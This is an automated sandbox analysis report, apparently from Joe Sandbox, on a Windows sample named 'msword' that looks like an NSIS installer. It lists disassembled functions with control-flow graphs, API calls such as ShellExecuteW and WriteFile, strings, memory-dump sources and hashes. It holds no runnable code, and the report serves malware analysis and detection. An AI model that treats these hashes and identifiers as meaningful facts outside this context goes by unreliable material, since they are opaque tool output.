                                                                            control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 004033E7
                                                                            • GetTickCount.KERNEL32 ref: 00403464
                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                            • wsprintfW.USER32 ref: 004034A4
                                                                            • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                            • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                            • String ID: ... %d%%$P1B$X1C$X1C
                                                                            • API String ID: 651206458-1535804072
                                                                            • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                            • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                            • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                            • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                            Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                            • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                            • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2740478559-0
                                                                            • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                            • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                            • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                            • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                            Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                            APIs
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GlobalFree.KERNELBASE(005A6820), ref: 00402387
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FreeGloballstrcpyn
                                                                            • String ID: hZ$Exch: stack < %d elements$Pop: stack empty$TargetedRejectAccomplishComicsEngagementRendered
                                                                            • API String ID: 1459762280-4085635947
                                                                            • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                            • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                            • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                            • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                            Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                            • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                            • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            • GlobalFree.KERNELBASE(005A6820), ref: 00402387
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                            • String ID:
                                                                            • API String ID: 3376005127-0
                                                                            • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                            • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                            • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                            • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                            Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                            • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                            • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                            • String ID:
                                                                            • API String ID: 2568930968-0
                                                                            • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                            • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                            • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                            • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                            Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                            APIs
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                            Strings
                                                                            • <RM>, xrefs: 00402713
                                                                            • TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00402770
                                                                            • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                            • String ID: <RM>$TargetedRejectAccomplishComicsEngagementRendered$WriteINIStr: wrote [%s] %s=%s in %s
                                                                            • API String ID: 247603264-3745045155
                                                                            • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                            • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                            • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                            • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                            Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                            APIs
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                            • API String ID: 3156913733-2180253247
                                                                            • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                            • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                            • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                            • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                            Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00405E9D
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: nsa
                                                                            • API String ID: 1716503409-2209301699
                                                                            • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                            • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                            • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                            • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                            Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                            • String ID: HideWindow
                                                                            • API String ID: 1249568736-780306582
                                                                            • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                            • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                            • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                            • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                            Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                            • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                            • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                            • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                            Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                            • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                            • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                            • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                            Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
